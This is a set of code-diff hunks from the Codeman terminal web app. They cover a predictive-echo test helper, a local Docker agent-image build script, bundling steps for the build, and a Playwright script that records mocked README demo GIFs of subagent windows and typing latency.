rowsEl.className = 'xterm-rows';
|
||||
element.appendChild(screen);
|
||||
screen.appendChild(rowsEl);
|
||||
document.body.appendChild(element);
|
||||
|
||||
const hybrid = {
|
||||
element,
|
||||
get cols() {
|
||||
return term.cols;
|
||||
},
|
||||
get rows() {
|
||||
return term.rows;
|
||||
},
|
||||
options: { fontFamily: 'monospace', fontSize: 14, fontWeight: 'normal', theme: {} },
|
||||
buffer: {
|
||||
active: {
|
||||
get viewportY() {
|
||||
return term.buffer.active.viewportY;
|
||||
},
|
||||
get baseY() {
|
||||
return term.buffer.active.baseY;
|
||||
},
|
||||
get cursorX() {
|
||||
return term.buffer.active.cursorX;
|
||||
},
|
||||
get cursorY() {
|
||||
return term.buffer.active.cursorY;
|
||||
},
|
||||
getLine: (y: number) => term.buffer.active.getLine(y),
|
||||
},
|
||||
},
|
||||
onWriteParsed: (cb: () => void) => term.onWriteParsed(cb),
|
||||
onResize: (cb: (s: { cols: number; rows: number }) => void) => term.onResize(cb),
|
||||
_core: {
|
||||
_renderService: {
|
||||
dimensions: {
|
||||
css: { cell: { width: CELL_W, height: CELL_H } },
|
||||
device: { char: { top: 0, height: CELL_H } },
|
||||
},
|
||||
},
|
||||
},
|
||||
};
|
||||
|
||||
return {
|
||||
hybrid: hybrid as unknown as XtermTerminal,
|
||||
term,
|
||||
write: (data: string) => new Promise<void>((resolve) => term.write(data, () => resolve())),
|
||||
cursorRowText() {
|
||||
const b = term.buffer.active;
|
||||
return b.getLine(b.baseY + b.cursorY)?.translateToString(true) ?? '';
|
||||
},
|
||||
rowText(viewportRow: number) {
|
||||
const b = term.buffer.active;
|
||||
return b.getLine(b.baseY + viewportRow)?.translateToString(true) ?? '';
|
||||
},
|
||||
spanCount() {
|
||||
return element.querySelectorAll('[data-predictive-echo] span').length;
|
||||
},
|
||||
spans() {
|
||||
return Array.from(element.querySelectorAll('[data-predictive-echo] span')) as HTMLSpanElement[];
|
||||
},
|
||||
cleanup() {
|
||||
term.dispose();
|
||||
element.remove();
|
||||
},
|
||||
};
|
||||
}
|
||||
|
||||
// ─── Codeman-side mirrors (keep in sync with terminal-ui.js) ────────────
|
||||
|
||||
/** Mirror of window.CodemanTerminalInput.classifyPredictInput. */
|
||||
export function classifyPredictInput(data: string): 'char' | 'backspace' | 'clear' | 'text' {
|
||||
const cps = Array.from(data);
|
||||
if (cps.length === 1) {
|
||||
const cp = cps[0].codePointAt(0)!;
|
||||
if (cp === 0x7f) return 'backspace';
|
||||
if (cp >= 0x20) return 'char';
|
||||
return 'clear';
|
||||
}
|
||||
if (data.charCodeAt(0) === 0x1b) return 'clear';
|
||||
if (data.charCodeAt(0) >= 0x20) return 'text';
|
||||
return 'clear';
|
||||
}
|
||||
|
||||
/** Mirror of the codex composer-row gate (CODEX_COMPOSER_ROW_RE). */
|
||||
export const CODEX_COMPOSER_ROW_RE = /^› /;
|
||||
|
||||
export function codexComposerGate(terminal: XtermTerminal): boolean {
|
||||
try {
|
||||
const buf = terminal.buffer.active;
|
||||
const line = buf.getLine(buf.baseY + (buf.cursorY ?? 0));
|
||||
return !!line && CODEX_COMPOSER_ROW_RE.test(line.translateToString(true));
|
||||
} catch {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
@@ -26,6 +26,13 @@ export default defineConfig([
|
||||
' this.activate(terminal);',
|
||||
' }',
|
||||
' };',
|
||||
' window.PredictiveEchoAddon=XtermZerolagInput.PredictiveEchoAddon;',
|
||||
' window.PredictiveEchoOverlay=class extends XtermZerolagInput.PredictiveEchoAddon{',
|
||||
' constructor(terminal){',
|
||||
' super({});',
|
||||
' this.activate(terminal);',
|
||||
' }',
|
||||
' };',
|
||||
'}',
|
||||
].join('\n'),
|
||||
},
|
||||
|
||||
@@ -0,0 +1,72 @@
|
||||
#!/usr/bin/env node
|
||||
/**
|
||||
* Build the Codeman agent base image locally (decision: "build locally on first
|
||||
* use", see docs/docker-cases-plan.md). No registry account required.
|
||||
*
|
||||
* Usage:
|
||||
* node scripts/build-agent-image.mjs [--engine docker|podman] [--image <ref>] [--no-cache]
|
||||
*
|
||||
* Defaults: engine=docker (falls back to podman if docker is absent),
|
||||
* image=codeman/agent:base
|
||||
*/
|
||||
import { spawn, spawnSync } from 'node:child_process';
|
||||
import { fileURLToPath } from 'node:url';
|
||||
import { dirname, join } from 'node:path';
|
||||
|
||||
const __dirname = dirname(fileURLToPath(import.meta.url));
|
||||
const REPO_ROOT = join(__dirname, '..');
|
||||
const DOCKERFILE = join(REPO_ROOT, 'docker', 'agent.Dockerfile');
|
||||
const DEFAULT_IMAGE = 'codeman/agent:base';
|
||||
|
||||
function parseArgs(argv) {
|
||||
const args = { image: DEFAULT_IMAGE, engine: undefined, noCache: false };
|
||||
for (let i = 0; i < argv.length; i++) {
|
||||
const a = argv[i];
|
||||
if (a === '--image') args.image = argv[++i];
|
||||
else if (a === '--engine') args.engine = argv[++i];
|
||||
else if (a === '--no-cache') args.noCache = true;
|
||||
else if (a === '-h' || a === '--help') args.help = true;
|
||||
}
|
||||
return args;
|
||||
}
|
||||
|
||||
function engineAvailable(engine) {
|
||||
const r = spawnSync(engine, ['--version'], { stdio: 'ignore' });
|
||||
return r.status === 0;
|
||||
}
|
||||
|
||||
function resolveEngine(preferred) {
|
||||
if (preferred) {
|
||||
if (!engineAvailable(preferred)) {
|
||||
console.error(`[build-agent-image] engine "${preferred}" not found on PATH`);
|
||||
process.exit(1);
|
||||
}
|
||||
return preferred;
|
||||
}
|
||||
if (engineAvailable('docker')) return 'docker';
|
||||
if (engineAvailable('podman')) return 'podman';
|
||||
console.error('[build-agent-image] neither docker nor podman found on PATH. Install one and retry.');
|
||||
process.exit(1);
|
||||
}
|
||||
|
||||
const args = parseArgs(process.argv.slice(2));
|
||||
if (args.help) {
|
||||
console.log('Usage: node scripts/build-agent-image.mjs [--engine docker|podman] [--image <ref>] [--no-cache]');
|
||||
process.exit(0);
|
||||
}
|
||||
|
||||
const engine = resolveEngine(args.engine);
|
||||
const buildArgs = ['build', '-f', DOCKERFILE, '-t', args.image];
|
||||
if (args.noCache) buildArgs.push('--no-cache');
|
||||
buildArgs.push(REPO_ROOT);
|
||||
|
||||
console.log(`[build-agent-image] ${engine} ${buildArgs.join(' ')}`);
|
||||
const child = spawn(engine, buildArgs, { stdio: 'inherit' });
|
||||
child.on('exit', (code) => {
|
||||
if (code === 0) {
|
||||
console.log(`\n[build-agent-image] built ${args.image}. Docker cases can now launch.`);
|
||||
} else {
|
||||
console.error(`\n[build-agent-image] build failed (exit ${code}).`);
|
||||
}
|
||||
process.exit(code ?? 1);
|
||||
});
|
||||
@@ -65,8 +65,25 @@ appendFileSync(
|
||||
'}\n'
|
||||
);
|
||||
|
||||
// Predictive echo (codex): separate bundle so the zerolag bundle stays byte-identical
|
||||
run('xterm-predictive-echo', 'npx esbuild packages/xterm-zerolag-input/src/predictive-echo-addon.ts --bundle --minify --format=iife --global-name=XtermPredictiveEcho --outfile=dist/web/public/vendor/xterm-predictive-echo.js');
|
||||
appendFileSync(
|
||||
join(ROOT, 'dist/web/public/vendor/xterm-predictive-echo.js'),
|
||||
'\n// Global aliases for browser usage\n' +
|
||||
'if(typeof window!=="undefined"){' +
|
||||
'window.PredictiveEchoAddon=XtermPredictiveEcho.PredictiveEchoAddon;' +
|
||||
'window.PredictiveEchoOverlay=class extends XtermPredictiveEcho.PredictiveEchoAddon{' +
|
||||
'constructor(terminal){' +
|
||||
'super({});' +
|
||||
'this.activate(terminal);' +
|
||||
'}' +
|
||||
'};' +
|
||||
'}\n'
|
||||
);
|
||||
|
||||
// 4. Minify frontend assets
|
||||
run('minify input-cjk.js', 'npx esbuild dist/web/public/input-cjk.js --minify --outfile=dist/web/public/input-cjk.js --allow-overwrite');
|
||||
run('minify i18n.js', 'npx esbuild dist/web/public/i18n.js --minify --outfile=dist/web/public/i18n.js --allow-overwrite');
|
||||
run('minify sanitize-html.js', 'npx esbuild dist/web/public/sanitize-html.js --minify --outfile=dist/web/public/sanitize-html.js --allow-overwrite');
|
||||
run('minify app.js', 'npx esbuild dist/web/public/app.js --minify --outfile=dist/web/public/app.js --allow-overwrite');
|
||||
run('minify terminal-ui.js', 'npx esbuild dist/web/public/terminal-ui.js --minify --outfile=dist/web/public/terminal-ui.js --allow-overwrite');
|
||||
@@ -86,6 +103,7 @@ console.log('\n[build] content-hash cache busting');
|
||||
'styles.css',
|
||||
'mobile.css',
|
||||
'constants.js',
|
||||
'i18n.js',
|
||||
'mobile-handlers.js',
|
||||
'voice-input.js',
|
||||
'notification-manager.js',
|
||||
@@ -104,6 +122,7 @@ console.log('\n[build] content-hash cache busting');
|
||||
'subagent-windows.js',
|
||||
'image-input.js',
|
||||
'vendor/xterm-zerolag-input.js',
|
||||
'vendor/xterm-predictive-echo.js',
|
||||
];
|
||||
const manifest = {};
|
||||
for (const file of HASHABLE) {
|
||||
|
||||
@@ -0,0 +1,482 @@
|
||||
#!/usr/bin/env node
|
||||
|
||||
/**
|
||||
* capture-readme-gifs.mjs
|
||||
*
|
||||
* Deterministic README GIFs — no real server, Claude CLI, or tmux. Reuses the
|
||||
* mock-injection pipeline from capture-readme-screenshots.mjs (static file
|
||||
* server + page.route mocks), drives a scripted timeline in the page, records
|
||||
* it with Playwright video, and converts to GIF via ffmpeg palette encoding.
|
||||
*
|
||||
* Scenes:
|
||||
* 1. subagent-demo.gif — terminal spawns 3 parallel agents; floating agent
|
||||
* windows open one by one and stream tool-call activity live (driven
|
||||
* through the real _onSubagentDiscovered/_onSubagentToolCall handlers).
|
||||
* 2. zerolag-demo.gif — side-by-side typing: instant local echo (zerolag)
|
||||
* vs bursty ~350 ms server echo, rendered with the vendored xterm.
|
||||
*
|
||||
* Usage: node scripts/capture-readme-gifs.mjs
|
||||
* SCREENSHOT_OUT_DIR=/path/to/review node scripts/capture-readme-gifs.mjs
|
||||
* Output: docs/images/ (or flat into SCREENSHOT_OUT_DIR)
|
||||
* Requires: ffmpeg
|
||||
*/
|
||||
|
||||
import { chromium } from 'playwright';
|
||||
import { execSync } from 'child_process';
|
||||
import { mkdtempSync, rmSync } from 'fs';
|
||||
import { tmpdir } from 'os';
|
||||
import { join } from 'path';
|
||||
import {
|
||||
PORT,
|
||||
SESSION_IDS,
|
||||
STANDARD_SESSIONS,
|
||||
buildInitPayload,
|
||||
startStaticServer,
|
||||
setupRoutes,
|
||||
injectState,
|
||||
outPath,
|
||||
RST, GRN, YEL, MAG, CYN, GRY, BOLD,
|
||||
} from './capture-readme-screenshots.mjs';
|
||||
|
||||
const sleep = (ms) => new Promise((r) => setTimeout(r, ms));
|
||||
|
||||
const GIF_COLORS = 192;
|
||||
|
||||
// ─── ffmpeg conversion (palette recipe from capture-subagent-gif.mjs) ────────
|
||||
|
||||
function webmToGif(videoPath, gifPath, { ss, duration, width, fps }) {
|
||||
// One GLOBAL palette (default stats_mode=full) + ordered dither: per-frame
|
||||
// palettes (stats_mode=single:new=1) make dirty rectangles visibly mismatch
|
||||
// on flat dark UI, and error-diffusion dither shimmers between frames.
|
||||
const filters = `fps=${fps},scale=${width}:-1:flags=lanczos`;
|
||||
execSync(
|
||||
`ffmpeg -y -loglevel error -ss ${ss.toFixed(2)} -t ${duration} -i "${videoPath}" ` +
|
||||
`-vf "${filters},split[s0][s1];[s0]palettegen=max_colors=${GIF_COLORS}:reserve_transparent=0[p];` +
|
||||
`[s1][p]paletteuse=dither=bayer:bayer_scale=5:diff_mode=rectangle" "${gifPath}"`,
|
||||
{ stdio: 'inherit' }
|
||||
);
|
||||
}
|
||||
|
||||
// ─── Scene 1: subagent demo ──────────────────────────────────────────────────
|
||||
|
||||
const SUBAGENT_VIEWPORT = { width: 1440, height: 810 };
|
||||
|
||||
// Terminal content visible before the agents spawn
|
||||
const TERMINAL_PRESPAWN = [
|
||||
'',
|
||||
`${GRN}●${RST} Working on ${CYN}/home/arkon/codeman-cases/testcase${RST} - I'll use the ${BOLD}Task tool${RST} to spawn parallel agents.`,
|
||||
'',
|
||||
`${GRN}●${RST} ${BOLD}Read${RST}(/home/arkon/codeman-cases/testcase/CLAUDE.md)`,
|
||||
` ${GRY}░${RST} Read ${BOLD}127${RST} lines ${GRY}│${RST} ${CYN}1.2KB${RST}`,
|
||||
'',
|
||||
`${GRN}●${RST} ${BOLD}Bash${RST}(find . -name "*.ts" -not -path "*/node_modules/*" | head -20)`,
|
||||
` ${GRY}░${RST} ./src/index.ts`,
|
||||
` ${GRY}░${RST} ./src/session.ts`,
|
||||
` ${GRY}░${RST} ./src/web/server.ts`,
|
||||
` ${GRY}░${RST} ${GRY}... (17 more)${RST}`,
|
||||
'',
|
||||
`${GRN}●${RST} I'll spawn 3 parallel research agents to analyze different parts of the codebase simultaneously.`,
|
||||
'',
|
||||
].join('\r\n');
|
||||
|
||||
function makeAgent(agentId, description, startedOffsetMs) {
|
||||
return {
|
||||
agentId,
|
||||
sessionId: 'claude-sess-w1-0001',
|
||||
projectHash: 'abc123',
|
||||
filePath: `/tmp/${agentId}.jsonl`,
|
||||
startedAt: new Date(Date.now() - startedOffsetMs).toISOString(),
|
||||
lastActivityAt: Date.now(),
|
||||
status: 'active',
|
||||
toolCallCount: 0,
|
||||
entryCount: 0,
|
||||
fileSize: 4000,
|
||||
description,
|
||||
model: 'claude-haiku-4-5-20251001',
|
||||
modelShort: 'haiku',
|
||||
totalInputTokens: 0,
|
||||
totalOutputTokens: 0,
|
||||
parentSessionId: SESSION_IDS.w1,
|
||||
};
|
||||
}
|
||||
|
||||
// Timeline events: t (ms from scene start) + kind
|
||||
// term — write raw data to the session terminal
|
||||
// discover — register subagent + open + position its floating window
|
||||
// tool — stream a tool call into an agent window
|
||||
// msg — stream an assistant message into an agent window
|
||||
// complete — flip an agent to completed
|
||||
function buildSubagentTimeline() {
|
||||
const T = (lines) => lines.join('\r\n') + '\r\n';
|
||||
const tool = (t, agentId, name, input) => ({ t, kind: 'tool', agentId, tool: name, input });
|
||||
const msg = (t, agentId, text) => ({ t, kind: 'msg', agentId, text });
|
||||
|
||||
return [
|
||||
{
|
||||
t: 600,
|
||||
kind: 'term',
|
||||
data: T([
|
||||
`${GRN}●${RST} ${BOLD}Task${RST}(Find and document all API endpoints in src/)`,
|
||||
` ${GRY}░${RST} Spawned ${CYN}agent-001${RST} ${GRY}(haiku)${RST}`,
|
||||
'',
|
||||
]),
|
||||
},
|
||||
{
|
||||
t: 1000,
|
||||
kind: 'discover',
|
||||
agent: makeAgent('agent-001', 'Find and document all API endpoints in src/', 2000),
|
||||
x: 440, y: 45,
|
||||
},
|
||||
tool(1500, 'agent-001', 'Glob', { pattern: 'src/**/*.ts' }),
|
||||
{
|
||||
t: 2000,
|
||||
kind: 'term',
|
||||
data: T([
|
||||
`${GRN}●${RST} ${BOLD}Task${RST}(Explore and understand test structure in test/)`,
|
||||
` ${GRY}░${RST} Spawned ${CYN}agent-002${RST} ${GRY}(haiku)${RST}`,
|
||||
'',
|
||||
]),
|
||||
},
|
||||
tool(2200, 'agent-001', 'Read', { file_path: '/home/arkon/codeman/src/web/server.ts' }),
|
||||
{
|
||||
t: 2500,
|
||||
kind: 'discover',
|
||||
agent: makeAgent('agent-002', 'Explore and understand test structure in test/', 1200),
|
||||
x: 880, y: 45,
|
||||
},
|
||||
tool(3000, 'agent-002', 'Glob', { pattern: 'test/**/*.test.ts' }),
|
||||
{
|
||||
t: 3300,
|
||||
kind: 'term',
|
||||
data: T([
|
||||
`${GRN}●${RST} ${BOLD}Task${RST}(Analyze TypeScript type definitions in src/types.ts)`,
|
||||
` ${GRY}░${RST} Spawned ${CYN}agent-003${RST} ${GRY}(haiku)${RST}`,
|
||||
'',
|
||||
]),
|
||||
},
|
||||
tool(3500, 'agent-001', 'Grep', { pattern: 'app\\.get|app\\.post|app\\.delete', path: 'src/' }),
|
||||
{
|
||||
t: 3800,
|
||||
kind: 'discover',
|
||||
agent: makeAgent('agent-003', 'Analyze TypeScript type definitions in src/types.ts', 400),
|
||||
x: 660, y: 400,
|
||||
},
|
||||
tool(4100, 'agent-002', 'Read', { file_path: '/home/arkon/codeman/test/respawn-test-utils.ts' }),
|
||||
{
|
||||
t: 4500,
|
||||
kind: 'term',
|
||||
data: T([
|
||||
`${MAG}✻${RST} ${YEL}Waiting for agents...${RST} ${GRY}(${BOLD}esc${RST}${GRY} to interrupt · 32s · ↓ 1.7k tokens · thinking)${RST}`,
|
||||
'',
|
||||
]),
|
||||
},
|
||||
tool(4700, 'agent-003', 'Read', { file_path: '/home/arkon/codeman/src/types.ts' }),
|
||||
tool(5200, 'agent-001', 'Read', { file_path: '/home/arkon/codeman/src/web/schemas.ts' }),
|
||||
tool(5600, 'agent-002', 'Read', { file_path: '/home/arkon/codeman/config/vitest.config.ts' }),
|
||||
tool(6100, 'agent-003', 'Grep', { pattern: 'export (interface|type)', path: 'src/types/' }),
|
||||
msg(6700, 'agent-001', 'Found 47 API endpoints across server.ts. Documenting REST paths...'),
|
||||
tool(7100, 'agent-002', 'Grep', { pattern: 'const PORT =', path: 'test/' }),
|
||||
msg(7700, 'agent-002', 'Analyzing test patterns: MockSession, unique ports, fileParallelism: false...'),
|
||||
tool(8100, 'agent-003', 'Read', { file_path: '/home/arkon/codeman/src/types/index.ts' }),
|
||||
msg(8700, 'agent-003', 'Mapped 38 exported interfaces across 15 domain files. Building summary...'),
|
||||
{
|
||||
t: 9300,
|
||||
kind: 'term',
|
||||
data: T([
|
||||
`${GRN}●${RST} ${CYN}agent-001${RST}: ${GRY}12 tool calls — Glob, Read(server.ts), Grep(endpoints)...${RST}`,
|
||||
`${GRN}●${RST} ${CYN}agent-002${RST}: ${GRY}8 tool calls — Glob, Read(test-utils), Read(vitest.config)...${RST}`,
|
||||
`${GRN}●${RST} ${CYN}agent-003${RST}: ${GRY}7 tool calls — Read(types.ts), Grep(interface)...${RST}`,
|
||||
'',
|
||||
]),
|
||||
},
|
||||
tool(10100, 'agent-001', 'Glob', { pattern: 'src/web/routes/*.ts' }),
|
||||
tool(10600, 'agent-002', 'Read', { file_path: '/home/arkon/codeman/test/setup.ts' }),
|
||||
tool(11100, 'agent-003', 'Grep', { pattern: 'assertNever', path: 'src/' }),
|
||||
{
|
||||
t: 11600,
|
||||
kind: 'term',
|
||||
data: T([`${GRN}●${RST} ${GRY}171.8k, 13s${RST} ${GRY}│${RST} ${GRY}1.7k tokens${RST} ${GRY}│${RST} ${GRY}thinking${RST}`, '']),
|
||||
},
|
||||
];
|
||||
}
|
||||
|
||||
const SUBAGENT_TAIL_HOLD = 2500; // hold the final frame
|
||||
|
||||
async function recordSubagentScene(browser, videoDir) {
|
||||
console.log('\n1/2 Recording subagent-demo...');
|
||||
|
||||
const context = await browser.newContext({
|
||||
viewport: SUBAGENT_VIEWPORT,
|
||||
deviceScaleFactor: 1,
|
||||
recordVideo: { dir: videoDir, size: SUBAGENT_VIEWPORT },
|
||||
});
|
||||
const recStart = Date.now();
|
||||
const page = await context.newPage();
|
||||
page.setDefaultTimeout(30000);
|
||||
|
||||
// Start with NO subagents — they appear during the recording
|
||||
const initPayload = buildInitPayload(STANDARD_SESSIONS);
|
||||
await setupRoutes(page, initPayload, TERMINAL_PRESPAWN);
|
||||
await page.goto(`http://localhost:${PORT}`, { waitUntil: 'domcontentloaded' });
|
||||
await injectState(page, initPayload, TERMINAL_PRESPAWN, SESSION_IDS.w1);
|
||||
|
||||
await page.evaluate(() => {
|
||||
try { window.app?.fitAddon?.fit(); } catch {}
|
||||
window.app?.terminal?.scrollToBottom();
|
||||
});
|
||||
await sleep(500);
|
||||
|
||||
const timeline = buildSubagentTimeline();
|
||||
const totalMs = Math.max(...timeline.map((e) => e.t)) + SUBAGENT_TAIL_HOLD;
|
||||
const sceneStart = Date.now();
|
||||
|
||||
// Run the whole timeline inside the page so events interleave naturally
|
||||
await page.evaluate((events) => {
|
||||
const app = window.app;
|
||||
for (const ev of events) {
|
||||
setTimeout(() => {
|
||||
try {
|
||||
if (ev.kind === 'term') {
|
||||
app.terminal.write(ev.data);
|
||||
app.terminal.scrollToBottom();
|
||||
} else if (ev.kind === 'discover') {
|
||||
app._onSubagentDiscovered(ev.agent);
|
||||
app.openSubagentWindow(ev.agent.agentId);
|
||||
// The spawn animation (400ms) lands on the auto-grid; glide to our tile after it
|
||||
setTimeout(() => {
|
||||
const win = app.subagentWindows.get(ev.agent.agentId);
|
||||
if (win?.element) {
|
||||
win.element.style.transition = 'left 0.25s ease, top 0.25s ease';
|
||||
win.element.style.left = `${ev.x}px`;
|
||||
win.element.style.top = `${ev.y}px`;
|
||||
}
|
||||
}, 520);
|
||||
setTimeout(() => {
|
||||
const win = app.subagentWindows.get(ev.agent.agentId);
|
||||
if (win?.element) win.element.style.transition = '';
|
||||
app.updateConnectionLines();
|
||||
}, 850);
|
||||
} else if (ev.kind === 'tool') {
|
||||
app._onSubagentToolCall({
|
||||
agentId: ev.agentId,
|
||||
tool: ev.tool,
|
||||
input: ev.input,
|
||||
timestamp: new Date().toISOString(),
|
||||
});
|
||||
} else if (ev.kind === 'msg') {
|
||||
app._onSubagentMessage({
|
||||
agentId: ev.agentId,
|
||||
role: 'assistant',
|
||||
text: ev.text,
|
||||
timestamp: new Date().toISOString(),
|
||||
});
|
||||
} else if (ev.kind === 'complete') {
|
||||
app._onSubagentCompleted({ agentId: ev.agentId, timestamp: new Date().toISOString() });
|
||||
}
|
||||
} catch (err) {
|
||||
console.error('timeline event failed', ev, err);
|
||||
}
|
||||
}, ev.t);
|
||||
}
|
||||
}, timeline);
|
||||
|
||||
await sleep(totalMs + 500);
|
||||
|
||||
await page.close();
|
||||
const videoPath = await page.video().path();
|
||||
await context.close();
|
||||
|
||||
return {
|
||||
videoPath,
|
||||
ss: (sceneStart - recStart) / 1000 - 0.4,
|
||||
duration: (totalMs + 400) / 1000,
|
||||
};
|
||||
}
|
||||
|
||||
// ─── Scene 2: zerolag typing comparison ──────────────────────────────────────
|
||||
|
||||
const ZEROLAG_VIEWPORT = { width: 1280, height: 470 };
|
||||
const TYPED_TEXT = 'echo "zero lag typing from anywhere"';
|
||||
const TYPE_INTERVAL_MS = 110;
|
||||
const REMOTE_FLUSH_MS = 350; // server-echo pane flushes queued chars in bursts
|
||||
const ZEROLAG_TAIL_HOLD = 1800;
|
||||
|
||||
const ZEROLAG_HTML = `<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<link rel="stylesheet" href="http://localhost:${PORT}/vendor/xterm.css">
|
||||
<script src="http://localhost:${PORT}/vendor/xterm.min.js"></script>
|
||||
<style>
|
||||
* { margin: 0; box-sizing: border-box; }
|
||||
body {
|
||||
width: 1280px; height: 470px; background: #0a0a0c;
|
||||
display: flex; align-items: center; justify-content: center; gap: 48px;
|
||||
font-family: -apple-system, 'Segoe UI', Roboto, sans-serif;
|
||||
}
|
||||
.pane { width: 560px; }
|
||||
.card {
|
||||
background: #131316; border: 1px solid rgba(255,255,255,0.08);
|
||||
border-radius: 10px; overflow: hidden;
|
||||
box-shadow: 0 8px 32px rgba(0,0,0,0.45);
|
||||
}
|
||||
.card-head {
|
||||
display: flex; align-items: baseline; gap: 10px;
|
||||
padding: 12px 16px; border-bottom: 1px solid rgba(255,255,255,0.06);
|
||||
}
|
||||
.dot { width: 9px; height: 9px; border-radius: 50%; align-self: center; }
|
||||
.title { font-size: 15px; font-weight: 600; color: #e8e8ea; }
|
||||
.sub { font-size: 12.5px; color: #8b8b92; }
|
||||
.term { padding: 16px 8px 12px 16px; height: 165px; }
|
||||
.good .dot { background: #22c55e; box-shadow: 0 0 8px rgba(34,197,94,0.7); }
|
||||
.bad .dot { background: #ef4444; box-shadow: 0 0 8px rgba(239,68,68,0.7); }
|
||||
.tag {
|
||||
margin-top: 14px; text-align: center; font-size: 14.5px; color: #7e7e86;
|
||||
}
|
||||
.tag b { color: #22c55e; font-weight: 600; }
|
||||
.bad-tag b { color: #ef4444; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="pane">
|
||||
<div class="card good">
|
||||
<div class="card-head">
|
||||
<span class="dot"></span>
|
||||
<span class="title">With zerolag-input</span>
|
||||
<span class="sub">instant local echo</span>
|
||||
</div>
|
||||
<div class="term" id="termLeft"></div>
|
||||
</div>
|
||||
<div class="tag">keystrokes echo in <b>0 ms</b></div>
|
||||
</div>
|
||||
<div class="pane">
|
||||
<div class="card bad">
|
||||
<div class="card-head">
|
||||
<span class="dot"></span>
|
||||
<span class="title">Without</span>
|
||||
<span class="sub">server round-trip echo</span>
|
||||
</div>
|
||||
<div class="term" id="termRight"></div>
|
||||
</div>
|
||||
<div class="tag bad-tag">keystrokes echo after <b>~350 ms</b></div>
|
||||
</div>
|
||||
</body>
|
||||
</html>`;
|
||||
|
||||
async function recordZerolagScene(browser, videoDir) {
|
||||
console.log('\n2/2 Recording zerolag-demo...');
|
||||
|
||||
const context = await browser.newContext({
|
||||
viewport: ZEROLAG_VIEWPORT,
|
||||
deviceScaleFactor: 1,
|
||||
recordVideo: { dir: videoDir, size: ZEROLAG_VIEWPORT },
|
||||
});
|
||||
const recStart = Date.now();
|
||||
const page = await context.newPage();
|
||||
page.setDefaultTimeout(30000);
|
||||
|
||||
await page.setContent(ZEROLAG_HTML, { waitUntil: 'load' });
|
||||
await page.waitForFunction(() => typeof Terminal !== 'undefined');
|
||||
|
||||
await page.evaluate(() => {
|
||||
const theme = {
|
||||
background: '#131316',
|
||||
foreground: '#e8e8ea',
|
||||
cursor: '#22c55e',
|
||||
cursorAccent: '#131316',
|
||||
};
|
||||
const mk = (id) => {
|
||||
const term = new Terminal({
|
||||
cols: 44,
|
||||
rows: 5,
|
||||
fontSize: 20,
|
||||
fontFamily: "'SF Mono', 'Cascadia Code', Menlo, monospace",
|
||||
cursorBlink: true,
|
||||
cursorStyle: 'block',
|
||||
theme,
|
||||
});
|
||||
term.open(document.getElementById(id));
|
||||
term.write('\x1b[32m❯\x1b[0m ');
|
||||
return term;
|
||||
};
|
||||
window.termLeft = mk('termLeft');
|
||||
window.termRight = mk('termRight');
|
||||
});
|
||||
await sleep(600);
|
||||
|
||||
const sceneStart = Date.now();
|
||||
const typingMs = TYPED_TEXT.length * TYPE_INTERVAL_MS;
|
||||
const totalMs = typingMs + REMOTE_FLUSH_MS + ZEROLAG_TAIL_HOLD;
|
||||
|
||||
await page.evaluate(
|
||||
({ text, interval, flushEvery }) => {
|
||||
let i = 0;
|
||||
const remoteQueue = [];
|
||||
const typer = setInterval(() => {
|
||||
if (i >= text.length) { clearInterval(typer); return; }
|
||||
const ch = text[i++];
|
||||
window.termLeft.write(ch); // local echo: instant
|
||||
remoteQueue.push(ch); // server echo: waits for the round-trip
|
||||
}, interval);
|
||||
const flusher = setInterval(() => {
|
||||
if (remoteQueue.length) window.termRight.write(remoteQueue.splice(0).join(''));
|
||||
if (i >= text.length && remoteQueue.length === 0) clearInterval(flusher);
|
||||
}, flushEvery);
|
||||
},
|
||||
{ text: TYPED_TEXT, interval: TYPE_INTERVAL_MS, flushEvery: REMOTE_FLUSH_MS }
|
||||
);
|
||||
|
||||
await sleep(totalMs + 400);
|
||||
|
||||
await page.close();
|
||||
const videoPath = await page.video().path();
|
||||
await context.close();
|
||||
|
||||
return {
|
||||
videoPath,
|
||||
ss: (sceneStart - recStart) / 1000 - 0.6, // small lead-in with idle cursors
|
||||
duration: (totalMs + 600) / 1000,
|
||||
};
|
||||
}
|
||||
|
||||
// ─── Main ────────────────────────────────────────────────────────────────────
|
||||
|
||||
async function main() {
|
||||
console.log('='.repeat(60));
|
||||
console.log('Codeman README GIF Capture');
|
||||
console.log('='.repeat(60));
|
||||
|
||||
const server = await startStaticServer();
|
||||
const videoDir = mkdtempSync(join(tmpdir(), 'codeman-gifs-'));
|
||||
let browser;
|
||||
|
||||
try {
|
||||
browser = await chromium.launch({
|
||||
headless: true,
|
||||
args: ['--no-sandbox', '--disable-setuid-sandbox', '--disable-dev-shm-usage', '--disable-gpu'],
|
||||
});
|
||||
|
||||
const sub = await recordSubagentScene(browser, videoDir);
|
||||
const subGif = outPath('images', 'subagent-demo.gif');
|
||||
webmToGif(sub.videoPath, subGif, { ss: Math.max(0, sub.ss), duration: sub.duration, width: 960, fps: 8 });
|
||||
console.log(` Saved: ${subGif}`);
|
||||
|
||||
const zl = await recordZerolagScene(browser, videoDir);
|
||||
const zlGif = outPath('images', 'zerolag-demo.gif');
|
||||
webmToGif(zl.videoPath, zlGif, { ss: Math.max(0, zl.ss), duration: zl.duration, width: 900, fps: 10 });
|
||||
console.log(` Saved: ${zlGif}`);
|
||||
|
||||
console.log('\nDone.');
|
||||
} catch (err) {
|
||||
console.error('\nFatal error:', err.message);
|
||||
console.error(err.stack);
|
||||
process.exitCode = 1;
|
||||
} finally {
|
||||
if (browser) await browser.close().catch(() => {});
|
||||
server.close();
|
||||
rmSync(videoDir, { recursive: true, force: true });
|
||||
}
|
||||
}
|
||||
|
||||
process.on('SIGINT', () => process.exit(1));
|
||||
|
||||
main();
|
||||
@@ -50,7 +50,10 @@ async function newCtx(browser) {
|
||||
try {
|
||||
localStorage.setItem('codeman:skin', skin);
|
||||
localStorage.setItem('codeman-font-size', String(font));
|
||||
const blob = { skin, showFileBrowser: false, showProjectInsights: false };
|
||||
const blob = { skin, showFileBrowser: false, showProjectInsights: false, showTokenCount: false };
|
||||
// Don't auto-hide subagent windows that belong to a non-active tab — the
|
||||
// subagent scene re-homes agents and needs both windows visible at once.
|
||||
blob.subagentActiveTabOnly = false;
|
||||
if (planUsage) blob.showPlanUsageLimits = true;
|
||||
localStorage.setItem('codeman-app-settings', JSON.stringify(blob));
|
||||
} catch {
|
||||
@@ -136,9 +139,9 @@ async function sceneSubagent(browser) {
